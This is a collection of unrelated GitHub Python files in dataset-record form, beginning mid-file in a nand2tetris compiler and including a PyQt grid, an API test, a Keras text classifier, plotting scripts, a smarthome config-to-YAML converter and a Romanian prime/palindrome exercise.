self._symbol_table.index_of(instance_name))\n\n self._output(\"identifier\", None)\n\n if self._text() == \"(\":\n method = self._class_name + \".\" + method\n self._expression_num += 1\n self._vm_writer.write_push(\"pointer\", 0)\n self._output(\"symbol\", \"(\")\n self.compile_expression_list()\n self._output(\"symbol\", \")\")\n elif self._text() == \".\":\n self._output(\"symbol\", \".\")\n method += \".\" + self._text()\n self._output(\"identifier\", None)\n self._output(\"symbol\", \"(\")\n self.compile_expression_list()\n self._output(\"symbol\", \")\")\n\n 
self._vm_writer.write_call(method, self._expression_num)\n self._expression_num = 0\n return\n\n def compile_expression_list(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n # XXX: It seems a bad check condition...\n if self._text() != \")\":\n self.compile_expression()\n self._expression_num += 1\n while self._text() == \",\":\n self._output(\"symbol\", \",\")\n self.compile_expression()\n self._expression_num += 1\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n PADDING = \" \"\n\n def _dump_xml(self, string):\n self._out_file.write(self.PADDING * self._indent + string + \"\\n\")\n\n def _output(self, tag, checked=None):\n e = self._element()\n if e.tag == tag and (checked is None or e.text == checked):\n elem = ET.Element(tag)\n elem.text = \" {} \".format(e.text)\n xml_str = ET.tostring(elem).decode()\n self._dump_xml(xml_str)\n # else:\n # raise RuntimeError(\"Compile Error\")\n self._advance()\n\n def _output_identifier(self, category, index, is_defined):\n e = self._element()\n if e.tag == \"identifier\":\n elem = ET.Element(\"identifier\")\n elem.text = \" {} \".format(e.text)\n xml_str = ET.tostring(elem).decode()\n self._dump_xml(xml_str)\n # else:\n # raise RuntimeError(\"Compile Error\")\n self._advance()\n\n def _element(self):\n return self._root[self._line_num]\n\n def _tag(self):\n return self._root[self._line_num].tag\n\n def _text(self):\n return self._root[self._line_num].text\n\n def _advance(self):\n self._line_num += 1\n return\n\n def _strip_text(self):\n rm_head = re.sub(r'^\\s', '', self._text())\n return re.sub(r'\\s$', '', rm_head)\n","repo_name":"koucs/nand2tetris","sub_path":"11/jac/jac/ex_compilation_engine.py","file_name":"ex_compilation_engine.py","file_ext":"py","file_size_in_byte":20301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"70101302627","text":"from PyQt6.QtWidgets import QGraphicsLineItem, QGraphicsItem, QWidget\nfrom PyQt6.QtCore import Qt, QRectF\nfrom PyQt6.QtGui import QPen, QColor\n\nclass Grid(QGraphicsItem):\n def __init__(self, size=0, n=0, parent=None) -> None:\n super().__init__(parent)\n self.size = size\n self.n = n\n self.lines = []\n\n self.step = self.size//n\n\n pen = QPen(QColor(\"#66000000\"))\n pen.setWidth(2)\n pen.setStyle(Qt.PenStyle.DashLine)\n pen.setDashPattern([2,2])\n for i in range(1,self.n):\n x = i*self.step\n line = QGraphicsLineItem(x,0,x,self.size)\n line.setPen(pen)\n self.lines.append(line)\n for j in range(1,self.n):\n y = j*self.step\n line = QGraphicsLineItem(0,y,self.size,y)\n line.setZValue(1)\n line.setPen(pen)\n self.lines.append(line)\n self.setZValue(1)\n\n def boundingRect(self):\n return QRectF(0,0,self.size,self.size)\n\n def paint(self, painter,option, widget):\n for line in self.lines:\n line.paint(painter,option,widget)","repo_name":"majikat768/HuntStatsLogger","sub_path":"src/MapWindow/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"70"}
+{"seq_id":"28507282333","text":"#!/usr/bin/python3\n\nimport requests\n\nrootUrl = 'http://api.arbetsformedlingen.se:80/af/v2/'\n\napiVersionReq = requests.get(rootUrl + 'forecasts/version')\nforecastsListReq = requests.get(rootUrl + 'forecasts/occupationalArea/forcastsRefs/list')\n\n#Check tjat its alive and no change\ndef test_apiVersion():\n assert apiVersionReq.status_code == 200\n assert apiVersionReq.text == '1.0.70'\n\n\n#Get any OccupationalAreaId and return json object\ndef getOccupationalAreaId(id):\n return requests.get(rootUrl + 'forecasts/occupationalArea/forcastsRefs/list/' + str(id))\n\n\n#Verify first object in list\ndef test_occupationalAreaId():\n occupationalAreaIdList = []\n occupationalAreaIdObj = getOccupationalAreaId(5).json()\n for element in occupationalAreaIdObj[0]['occupationPrognosisRefs']: #use to improve test\n occupationalAreaIdList.append(element)\n assert occupationalAreaIdObj[0]['occupationPrognosisRefs'][0]['heading'] == 'Marknadsanalytiker och marknadsförare'\n assert (occupationalAreaIdList[0]['heading']) == 'Marknadsanalytiker och marknadsförare' #same but make more tests\n\n","repo_name":"matildak/occupation-forecasts-API","sub_path":"test_yrkesprognoser.py","file_name":"test_yrkesprognoser.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9829442027","text":"#문장(시계열수치)입력 다중클래스분류 모델 레시피5\n\n#순환 컨볼루션 신경망 모델\n#컨볼루션 레이어에서 나온 특징벡터들을 맥스풀링를 통해 1/4로 줄여준 다음 LSTM의 입력으로 넣어주는 모델이다. \n#컨볼루션 레이어에서 반환한 118개의 벡터를 1/4로 줄여서 29개를 반환한다. \n#따라서 LSTM 레이어의 timesteps는 49개가 된다. \n#참고로 input_dim은 256이다.\n#model = Sequential()\n#model.add(Embedding(max_features, 128, input_length=text_max_words))\n#model.add(Dropout(0.2))\n#model.add(Conv1D(256,\n# 3,\n# padding='valid',\n# activation='relu',\n# strides=1))\n#model.add(MaxPooling1D(pool_size=4))\n#model.add(LSTM(128))\n#model.add(Dense(46, activation='softmax'))\n\n# 0. 사용할 패키지 불러오기\nfrom keras.datasets import reuters\nfrom keras.utils import np_utils\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding, LSTM\nfrom keras.layers import Flatten, Dropout\nfrom keras.layers import Conv1D, MaxPooling1D\n\nmax_features = 15000\ntext_max_words = 120\n\n# 1. 데이터셋 생성하기\n\n# 훈련셋과 시험셋 불러오기\n(x_train, y_train), (x_test, y_test) = reuters.load_data(num_words=max_features)\n\n# 훈련셋과 검증셋 분리\nx_val = x_train[7000:]\ny_val = y_train[7000:]\nx_train = x_train[:7000]\ny_train = y_train[:7000]\n\n# 데이터셋 전처리 : 문장 길이 맞추기\nx_train = sequence.pad_sequences(x_train, maxlen=text_max_words)\nx_val = sequence.pad_sequences(x_val, maxlen=text_max_words)\nx_test = sequence.pad_sequences(x_test, maxlen=text_max_words)\n\n# one-hot 인코딩\ny_train = np_utils.to_categorical(y_train)\ny_val = np_utils.to_categorical(y_val)\ny_test = np_utils.to_categorical(y_test)\n\n# 2. 모델 구성하기\nmodel = Sequential()\nmodel.add(Embedding(max_features, 128, input_length=text_max_words))\nmodel.add(Dropout(0.2))\nmodel.add(Conv1D(256,\n 3,\n padding='valid',\n activation='relu',\n strides=1))\nmodel.add(MaxPooling1D(pool_size=4))\nmodel.add(LSTM(128))\nmodel.add(Dense(46, activation='softmax'))\n\n# 3. 모델 학습과정 설정하기\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n# 4. 모델 학습시키기\nhist = model.fit(x_train, y_train, epochs=10, batch_size=64, validation_data=(x_val, y_val))\n\n# 5. 학습과정 살펴보기\nimport matplotlib.pyplot as plt\n\nfig, loss_ax = plt.subplots()\n\nacc_ax = loss_ax.twinx()\n\nloss_ax.plot(hist.history['loss'], 'y', label='train loss')\nloss_ax.plot(hist.history['val_loss'], 'r', label='val loss')\nloss_ax.set_ylim([0.0, 3.0])\n\nacc_ax.plot(hist.history['accuracy'], 'b', label='train acc')\nacc_ax.plot(hist.history['val_accuracy'], 'g', label='val acc')\nacc_ax.set_ylim([0.0, 1.0])\n\nloss_ax.set_xlabel('epoch')\nloss_ax.set_ylabel('loss')\nacc_ax.set_ylabel('accuracy')\n\nloss_ax.legend(loc='upper left')\nacc_ax.legend(loc='lower left')\n\nplt.show()\n\n# 6. 모델 평가하기\nloss_and_metrics = model.evaluate(x_test, y_test, batch_size=64)\nprint('## evaluation loss and_metrics ##')\nprint(loss_and_metrics)\n\n'''\n학습결과 비교\n단순한 다층퍼셉트론 신경망 모델보다는 순환 레이어나 컨볼루션 레이어를 이용한 모델의 성능이 더 높았습니다.\n\n요약\n문장을 입력하여 다중클래스를 분류할 수 있는 여러가지 모델을 살펴보고, 그 성능을 비교해봤습니다. \n시계열 데이터를 처리하기 위한 모델은 다층퍼셉트론 신경망 모델부터 컨볼루션 신경망, 순환 신경망 모델 등 다양하게 구성할 수 있습니다.\n'''\n","repo_name":"Capybara92/python_study","sub_path":"02_Keras_Library/03_FollowRecipe/FollowRecipe_38.py","file_name":"FollowRecipe_38.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28389140222","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 7 16:29:37 2021\r\n\r\n@author: obareau\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport pickle\r\n\r\n# Load data thanks to StackOverflow \r\nwith open ('devs-outside-time.pickle', 'rb') as f:\r\n data = pickle.load(f)\r\n \r\n# Print(data)\r\n\r\n# Split into two listes\r\n\r\ntime, responses = zip(*data)\r\n\r\nplt.pie(responses, labels=time, autopct='%.2d%%') # Default Python format specifier %2d%% or for a flot %2f%%\r\n# force the x/y to have the same scale\r\n# circle instead of an oval\r\nplt.axis('equal')\r\nplt.title('Daily Time Developer Spend Outside')\r\nplt.show","repo_name":"obareau/DaTaViz","sub_path":"Data-Visualization-Source-Code-up/Data-Visualization-Source-Code/data-viz/matplotlib/pie-olivier.py","file_name":"pie-olivier.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24702287936","text":"#!/usr/bin/env python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nfrom functions import is_between\nfrom scipy.interpolate import interp1d\n\ndef hier_calc(j, path, dx_grid):\n print('\\nCalculating moment hierarchy...')\n nbody_filename = 'output_{0:04d}.txt'.format(j)\n nbody_file = np.genfromtxt(path + nbody_filename)\n x_nbody = nbody_file[:,-1]\n v_nbody = nbody_file[:,2]\n\n par_num = x_nbody.size\n L = 1.0\n x_grid = np.arange(0, L, dx_grid)\n N = x_grid.size\n k_grid = np.fft.ifftshift(2.0 * np.pi / L * np.arange(-N/2, N/2))\n x_grid = np.arange(0+dx/2, 1+dx/2, dx_grid)\n\n M0 = np.zeros(x_grid.size)\n M1 = np.zeros(x_grid.size)\n M2 = np.zeros(x_grid.size)\n C1 = np.zeros(x_grid.size)\n C2 = np.zeros(x_grid.size)\n for j in range(x_grid.size):\n if j == x_grid.size-1:\n s = is_between(x_nbody, x_grid[0]-dx/2, x_grid[1]-dx/2)\n else:\n s = is_between(x_nbody, x_grid[j]-dx/2, x_grid[j+1]-dx/2)\n vels = v_nbody[s[0]]\n M0[j] = s[0].size\n C1[j] = sum(vels) / len(vels)\n C2[j] = sum(vels**2) / len(vels)\n\n M0 /= np.mean(M0)\n M1 = M0 * C1\n\n M2 = C2 * M0\n C0 = M0\n return x_grid, M0, M1, M2, C0, C1, C2\n\npath = 'cosmo_sim_1d/sim_k_1_11/run1/'\nj = 0\ndx = 0.01\na = np.genfromtxt(path + 'aout_{0:04d}.txt'.format(j))\n\n\nx, M0, M1, M2, C0, C1, C2 = hier_calc(j, path, dx)\n\nfilename = './hier_test/hier_{0:04d}.hdf5'.format(j)\nfile = h5py.File(filename, 'w')\nfile.create_group('Header')\nheader = file['Header']\na = np.genfromtxt(path + 'aout_{0:04d}.txt'.format(j))\nprint('a = ', a)\nheader.attrs.create('a', a, dtype=float)\nheader.attrs.create('dx', dx, dtype=float)\nmoments = file.create_group('Moments')\nmoments.create_dataset('M0', data=M0)\nmoments.create_dataset('M1', data=M1)\nmoments.create_dataset('M2', data=M2)\nmoments.create_dataset('C0', data=C0)\nmoments.create_dataset('C1', data=C1)\nmoments.create_dataset('C2', data=C2)\nfile.close()\n\n\nfilename = './hier_test/hier_{0:04d}.hdf5'.format(j)\nfile = h5py.File(filename, mode='r')\nheader = file['/Header']\na = header.attrs.get('a')\ndx = header.attrs.get('dx')\n\nmoments = file['/Moments']\nmom_keys = list(moments.keys())\nC0 = np.array(moments[mom_keys[0]])\nC1 = np.array(moments[mom_keys[1]])\nC2 = np.array(moments[mom_keys[2]])\nM0 = np.array(moments[mom_keys[3]])\nM1 = np.array(moments[mom_keys[4]])\nM2 = np.array(moments[mom_keys[5]])\nfile.close()\n\n# C2 -= C1**2\n\nnbody_filename = 'output_{0:04d}.txt'.format(j)\nnbody_file = np.genfromtxt(path + nbody_filename)\nx_nbody = nbody_file[:,-1]\nv_nbody = nbody_file[:,2]\n\nmoments_filename = 'output_hierarchy_{0:04d}.txt'.format(j)\nmoments_file = np.genfromtxt(path + moments_filename)\na = moments_file[:,-1][0]\nx_cell = moments_file[:,0]\nM0_nbody = moments_file[:,2]\nM1_nbody = moments_file[:,4]\nM2_nbody = moments_file[:,6]\n\nplt.rcParams.update({\"text.usetex\": True})\nplt.rcParams.update({\"font.family\": \"serif\"})\nfig, ax = plt.subplots()\nax.set_title(r'$a = {}$'.format(a), fontsize=16)\n\n# arr = M0\n\n# ax.plot(x, arr, c='k', lw=2)\n# ax.plot(x, np.flip(arr), c='r', lw=2, ls='dashed')\n# ax.plot(x, arr-np.flip(arr), c='r', lw=2, ls='dashed')\n\n# ax.plot(x, C2, c='k', lw=2)\nax.plot(x_cell, M0_nbody, c='r', lw=2)\nax.plot(x, M0, c='b', ls='dashed', lw=2)\n\nprint(x.size, M0.size)\n\n# ax.set_xlim(0.995, 1.002)\nax.legend(fontsize=12)\nax.tick_params(axis='both', which='both', direction='in', labelsize=12)\nax.ticklabel_format(scilimits=(-2, 3))\nax.grid(lw=0.2, ls='dashed', 
color='grey')\nax.yaxis.set_ticks_position('both')\nax.minorticks_on()\n\nplt.show()\n","repo_name":"mandarmk9/eft_code","sub_path":"hier_calc.py","file_name":"hier_calc.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42693925222","text":"from gensim.models import word2vec\r\n\r\n#\r\n# s1=['今天','天气','真好']\r\n# s2=['今天','天气','很好']\r\n\r\ns1 = [1, 2, 3]\r\ns2 = [1, 2, 4]\r\n\r\nseqs = [s1, s2]\r\n\r\nmodel = word2vec.Word2Vec(seqs, vector_size=10, min_count=1)\r\nprint(model.wv.most_similar(1, topn=3))\r\n","repo_name":"HuichuanLI/GraphNeuralNetWork","sub_path":"GNN/s24_word2vec.py","file_name":"s24_word2vec.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"70"}
+{"seq_id":"31060073345","text":"import os\n\nRUAMEL_YAML_INSTALLED = False\ntry:\n import ruamel.yaml as yaml\n RUAMEL_YAML_INSTALLED = True\nexcept:\n print('ERROR: module ruamel.yaml not found')\n print('')\n print('Please install ruamel.yaml using the command:')\n print('sudo pip3 install ruamel.yaml')\n print('')\n RUAMEL_YAML_INSTALLED = False\n import yaml\n\n\nimport collections\nfrom collections import OrderedDict\n\n\nyaml_version = '1.1'\nindent_spaces = 4\nstore_raw_output = False\t\t\t# Only for testing, otherwise False\n\n\ndef is_ruamelyaml_installed():\n\n return RUAMEL_YAML_INSTALLED\n\n\n# ==================================================================================\n# config loader from config.py modified for parsing to yaml\n#\n\n\ndef _strip_quotes(string):\n string = string.strip()\n # check if string starts with ' or \", and end with it, if they are the only one\n if len(string) >= 2 and string[0] in ['\"', \"'\"] and string[0] == string[-1] and string.count(string[0]) == 2:\n string = string[1:-1] # remove them\n return string\n\n\ndef _handle_multiline_string(string):\n if len(string) > 0 and string.find('\\n') > -1 and string[0] != '|':\n string = '|\\n' + string\n return string\n\n\ndef parse_for_convert(filename=None, conf_code=None, config=None):\n valid_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@*'\n valid_set = set(valid_chars)\n if config is None:\n config = collections.OrderedDict()\n item = config\n offset = 0\n lastline_was_comment = False\n last_comment_nr = 0\n\n if filename != None:\n print(\"- parsing '{}'\".format(os.path.basename(filename)), end=\"\")\n with open(filename, 'r', encoding='UTF-8') as f:\n lines = iter(f.readlines())\n elif isinstance(conf_code, str):\n lines = conf_code.splitlines()\n else:\n return config\n\n linenu = 0\n parents = collections.OrderedDict()\n parent = collections.OrderedDict()\n if 1 == 1:\n for raw in lines:\n linenu += 1\n line = raw.lstrip('\\ufeff') # remove BOM\n\n multiline = []\n if line.rstrip().endswith('\\\\'):\n i = 0\n while line.rstrip().endswith('\\\\'):\n multiline.append( line.rstrip().rstrip('\\\\').strip() )\n i += 1\n linenu += 1\n line = next(lines, '').lstrip()\n line = '\\n'.join(multiline) + '\\n'+line.strip()\n lastline_was_comment = False\n\n if (len(multiline) == 0) or (line[0] == '#'):\n if len(multiline) == 0:\n comment_in_line = line.find('#')\n comment = line.partition('#')[2].strip()\n if comment_in_line > -1 and comment == '':\n comment = '>**<'\n line = line.partition('#')[0].strip()\n # inline comment\n if (line != '') and (comment != '') and line.find('[') == -1:\n attr, __, value = line.partition('=')\n if (\"'\" in line) or (\"|\" in line):\n comment = attr.strip() + ': ' + comment\n else:\n line = line + ' ## ' + comment\n comment = ''\n else:\n comment = line\n line = ''\n if comment != '':\n while (comment != '') and (comment[0] == '#'):\n comment = comment[1:].strip()\n if comment != '':\n comment = comment.replace('\\t', ' ')\n if 'comment' in item.keys():\n if lastline_was_comment:\n if last_comment_nr > 0:\n item['comment'+str(last_comment_nr)] = _handle_multiline_string(item['comment'+str(last_comment_nr)] + '\\n' + _strip_quotes(comment))\n else:\n item['comment'] = _handle_multiline_string(item['comment'] + '\\n' + _strip_quotes(comment))\n else:\n i = 1\n while 'comment'+str(i) in item.keys():\n i += 1\n item['comment'+str(i)] = _handle_multiline_string(_strip_quotes(comment))\n last_comment_nr = i\n else:\n# logger.info(\"comment: 
'{}'\".format(comment))\n item['comment'] = _handle_multiline_string(_strip_quotes(comment))\n last_comment_nr = 0\n lastline_was_comment = True\n\n if line == '':\n continue\n if line[0] == '[': # item\n lastline_was_comment = False\n #\n comment_in_line = line.find('#')\n comment = line.partition('#')[2].strip()\n if comment_in_line > -1 and comment == '':\n comment = '>**<'\n line = line.partition('#')[0].strip()\n #\n brackets = 0\n level = 0\n closing = False\n for index in range(len(line)):\n if line[index] == '[' and not closing:\n brackets += 1\n level += 1\n elif line[index] == ']':\n closing = True\n brackets -= 1\n else:\n closing = True\n if line[index] not in valid_chars + \"'\":\n print()\n print(\"ERROR: Problem (1) parsing '{}' invalid character in \\nline {}: {}. \\nValid chars: {}\".format(os.path.basename(filename), linenu, line, valid_chars))\n return config\n if brackets != 0:\n print()\n print(\"ERROR: Problem parsing '{}' unbalanced brackets in line {}: {}\".format(filename, linenu, line))\n return config\n #\n if comment_in_line > -1:\n print()\n print(\"ERROR: Problem parsing '{}' \\nunhandled comment {} in \\nline {}: {}. \\nValid chars: {}\".format(os.path.basename(filename), comment, linenu, line, valid_chars))\n #\n name = line.strip(\"[]\")\n name = _strip_quotes(name)\n if level - offset == 1:\n if name not in config:\n config[name] = collections.OrderedDict()\n item = config[name]\n parents = collections.OrderedDict()\n parents[level] = item\n else:\n if level - 1 not in parents:\n offset = level - 1\n if name not in config:\n config[name] = collections.OrderedDict()\n item = config[name]\n parents = collections.OrderedDict()\n parents[level] = item\n else:\n parent = parents[level - 1]\n if name not in parent:\n parent[name] = collections.OrderedDict()\n item = parent[name]\n parents[level] = item\n\n else: # attribute\n lastline_was_comment = False\n attr, __, value = line.partition('=')\n comm = ''\n if '##' in value:\n value, __, comm = value.partition('##')\n value = _strip_quotes(value)\n value = value + ' ## ' + comm.strip()\n# print(\"= attr >{}<, value >{}<, comment >{}<\".format(attr, value, comm))\n if not value:\n continue\n attr = attr.strip()\n if not set(attr).issubset(valid_set):\n print()\n print(\"line: '{}'\".format(line))\n print(\"ERROR: Problem (2) parsing '{}' invalid character in line {}: {}. 
Valid characters are: {}\".format(filename, linenu, attr, valid_chars))\n continue\n if '|' in value:\n item[attr] = [_strip_quotes(x) for x in value.split('|')]\n else:\n svalue = _handle_multiline_string(_strip_quotes(value))\n try:\n ivalue = int(svalue)\n item[attr] = ivalue\n except:\n item[attr] = svalue.replace('\\t', ' ')\n\n return config\n\n\n# ##################################################################################\n# YAML handling routines\n#\n\ndef _yaml_save_roundtrip(filename, data):\n \"\"\"\n Dump yaml using the RoundtripDumper and correct linespacing in output file\n \"\"\"\n\n sdata = yaml.dump(data, Dumper=yaml.RoundTripDumper, version=yaml_version, indent=indent_spaces, block_seq_indent=2, width=32768, allow_unicode=True)\n\n ldata = sdata.split('\\n')\n rdata = []\n for index, line in enumerate(ldata):\n # Fix for ruamel.yaml handling: Reinsert empty line before comment of next section\n if len(line.lstrip()) > 0 and line.lstrip()[0] == '#':\n indentcomment = len(line) - len(line.lstrip(' '))\n indentprevline = len(ldata[index-1]) - len(ldata[index-1].lstrip(' '))\n if indentprevline - indentcomment >= 2*indent_spaces:\n rdata.append('')\n rdata.append(line)\n # Fix for ruamel.yaml handling: Remove empty line with spaces that have been inserted\n elif line.strip() == '' and line != '':\n if ldata[index-1] != '':\n rdata.append(line)\n else:\n rdata.append(line)\n\n sdata = '\\n'.join(rdata)\n if sdata[0] == '\\n':\n sdata =sdata[1:]\n\n with open(filename+'.yaml', 'w', encoding='utf8') as outfile:\n outfile.write( sdata )\n\n\n\ndef yaml_save(filename, data):\n \"\"\"\n ***Converter Special ***\n\n Save contents of an OrderedDict structure to a yaml file\n\n :param filename: name of the yaml file to save to\n :param data: OrderedDict to save\n \"\"\"\n\n sdata = convert_yaml(data)\n\n print(\", saving to '{}'\".format(os.path.basename(filename)+'.yaml'))\n if store_raw_output == True:\n with open(filename+'_raw.yaml', 'w', encoding='UTF-8') as outfile:\n outfile.write( sdata )\n\n # Test if roundtrip gives the same result\n data = yaml.load(sdata, yaml.RoundTripLoader)\n _yaml_save_roundtrip(filename, data)\n\n\ndef convert_yaml(data):\n \"\"\"\n ***Converter Special ***\n\n Convert data structure to yaml format\n\n :param data: OrderedDict to convert\n :return: yaml formated data\n \"\"\"\n\n ordered = (type(data).__name__ == 'OrderedDict')\n if ordered:\n sdata = _ordered_dump(data, Dumper=yaml.SafeDumper, version=yaml_version, indent=indent_spaces, block_seq_indent=2, width=32768, allow_unicode=True, default_flow_style=False)\n else:\n sdata = yaml.dump(data, Dumper=yaml.SafeDumper, indent=indent_spaces, block_seq_indent=2, width=32768, allow_unicode=True, default_flow_style=False)\n sdata = _format_yaml_dump(sdata)\n\n return sdata\n\n\ndef _format_yaml_dump(data):\n \"\"\"\n ***Converter Special ***\n\n Format yaml-dump to make file more readable\n (yaml structure must be dumped to a stream before using this function)\n | Currently does the following:\n | - Add an empty line before a new item\n\n :param data: string to format\n\n :return: formatted string\n \"\"\"\n\n data = data.replace('\\n\\n', '\\n')\n ldata = data.split('\\n')\n rdata = []\n\n for index, line in enumerate(ldata):\n if len(line) > 0:\n # Handle inline-comments from converter\n if line.find('##') > -1 and line.find(\": '\") > -1 and line[-1:] == \"'\":\n line = line.replace('##', '#')\n line = line.replace(\": '\", \": \")\n line = line[:-1]\n\n # Handle comments from converter\n if 
line.find('comment') > -1 and line.find(':') > line.find('comment'):\n# print('comment-line>', line, '<')\n indent = len(line) - len(line.lstrip(' '))\n if ldata[index+1][-1:] == ':':\n indent = len(ldata[index+1]) - len(ldata[index+1].lstrip(' '))\n if line.find(': \"|') > -1:\n line = line[:-1]\n line = line.replace(': \"|', ': |')\n else:\n line = line.replace(': ', ': |\\\\n', 1)\n# print('# ' + line[line.find(\"|\\\\n\")+3:])\n line = \" \"*indent + '# ' + line[line.find(\"|\\\\n\")+3:]\n line = line.replace('>**<', '')\n line = line.replace('\\\\n', '\\n'+\" \"*indent + '# ')\n\n # Handle newlines for multiline string-attributes ruamel.yaml\n if line.find(': \"|') > -1 and line[-1:] == '\"' and line.find('\\\\n') > -1:\n indent = len(line) - len(line.lstrip(' ')) + indent_spaces\n line = line[:-1]\n line = line.replace(': \"|', ': |')\n line = line.replace('\\\\n', '\\n'+\" \"*indent)\n\n rdata.append(line)\n\n\n ldata = rdata\n rdata = []\n for index, line in enumerate(ldata):\n if len(line.lstrip()) > 0 and line.lstrip()[0] == '#' and ldata[index+1][-1:] == ':':\n rdata.append('')\n rdata.append(line)\n\n # Insert empty line before section (key w/o a value)\n elif line[-1:] == ':':\n if not (len(ldata[index-1].lstrip()) > 0 and ldata[index-1].lstrip()[0] == '#'):\n # no empty line before list attributes\n if ldata[index+1].strip()[0] != '-':\n rdata.append('')\n rdata.append(line)\n else:\n rdata.append(line)\n else:\n rdata.append(line)\n\n fdata = '\\n'.join(rdata)\n if fdata[0] == '\\n':\n fdata = fdata[1:]\n return fdata\n\n\ndef _ordered_dump(data, stream=None, Dumper=yaml.Dumper, **kwds):\n \"\"\"\n Ordered yaml dumper\n Use this instead ot yaml.Dumper/yaml.SaveDumper to get an Ordereddict\n\n :param stream: stream to write to\n :param Dumper: yaml-dumper to use\n :**kwds: Additional keywords\n\n :return: OrderedDict structure\n \"\"\"\n\n # usage example: ordered_dump(data, Dumper=yaml.SafeDumper)\n class OrderedDumper(Dumper):\n pass\n def _dict_representer(dumper, data):\n return dumper.represent_mapping(\n yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,\n data.items())\n OrderedDumper.add_representer(OrderedDict, _dict_representer)\n return yaml.dump(data, stream, OrderedDumper, **kwds)\n\n\n","repo_name":"smarthomeNG/smarthome","sub_path":"lib/item_conversion.py","file_name":"item_conversion.py","file_ext":"py","file_size_in_byte":14969,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"70"}
+{"seq_id":"28540872205","text":"def is_palindrome(n):\n ''''\n -determina daca numarul dat este palindrom sau nu\n Input:\n -paramtru: n (de tip int)\n Output:\n -va returna True, daca n este palindrom, sau False, in caz contrar(de tip bool)\n '''\n copie=n\n invers=0\n while copie:\n invers=invers*10+copie%10\n copie=copie//10\n if invers == n:\n return True\n return False\n\n\ndef test_is_palindrome():\n assert is_palindrome(1221) == True\n assert is_palindrome(3453) == False\n assert is_palindrome(565) == True\n assert is_palindrome(717) == True\n assert is_palindrome(9807) == False\n assert is_palindrome(10401) == True\n assert is_palindrome(1232) == False\n\n\ntest_is_palindrome()\n\n\ndef verificare_prim(n):\n if n == 1:\n return False\n if n==2:\n return True\n if n % 2 == 0:\n return False\n for i in range(3, n // 2 + 1, 2):\n if n % i == 0:\n return False\n return True\n\n\ndef is_superprime(n):\n ''''\n -deteremina daca un numar este superprim sau nu\n Input:\n -parametru: n (de tip intreg)\n Output:\n -va returna True, daca n este superprim, sau False, in caz contrar(de tip bool)\n '''\n copie = n\n verificare = 1\n #presupunem ca numarul dat este superprim\n while copie:\n if not verificare_prim(copie):\n verificare=0\n break\n copie=copie//10\n if verificare==1:\n return True\n return False\n\n\ndef test_is_superprime():\n assert is_superprime(124) == False\n assert is_superprime(233) == True\n assert is_superprime(1290) == False\n assert is_superprime(239) == True\n assert is_superprime(14) == False\n\n\ntest_is_superprime()\n\n\ndef get_largest_prime_below(n):\n '''\n -determina ultimul numar prim mai mic decat numarul n dat\n Input\n -parametru n(de tip intreg)\n Output\n -nr_prim:ultimul numar prim mai mic decat numarul n dat\n '''\n nr_prim=n-1\n ok=False\n if n<=2:\n return None\n while not ok:\n if verificare_prim(nr_prim):\n ok=True\n break\n nr_prim=nr_prim-1\n return nr_prim\n\n\ndef test_get_largest_prime_below():\n assert get_largest_prime_below(25) == 23\n assert get_largest_prime_below(18) == 17\n assert get_largest_prime_below(36) == 31\n assert get_largest_prime_below(135) == 131\n assert get_largest_prime_below(76) == 73\n\ntest_get_largest_prime_below()\n\ndef main():\n while True:\n print(\"1.Determina daca un numar dat este palindrom.\")\n print(\"2.Determina daca un numar dat este superprim.\")\n print(\"3.Determina ultimul numar prim mai mic decat un numar dat.\")\n print(\"x.Iesire\")\n optiune=input(\"Dati optiunea:\")\n if optiune==\"1\":\n numar=int(input(\"Dati numar:\"))\n if is_palindrome(numar):\n print(\"Numarul dat este palindrom.\")\n else:\n print(\"Numarul dat nu este palindrom.\")\n elif optiune==\"2\":\n numar=int(input(\"Dati numar:\"))\n if is_superprime(numar):\n print(\"Numarul dat este superprim.\")\n else:\n print(\"Numarul dat nu este superprim.\")\n elif optiune==\"3\":\n numar = int(input(\"Dati numar:\"))\n nrprim=get_largest_prime_below(numar)\n if nrprim:\n print(\"Ultimul numar prim mai mic decat numarul dat este \",nrprim)\n else:\n print(\"Nu exista!\")\n elif optiune==\"x\":\n print(\"Meniul se va inchide.\")\n break\n else:\n print(\"Optiune inexistenta. Reincercati!\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"AP-MI-2021/lab-2-nutubianca","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
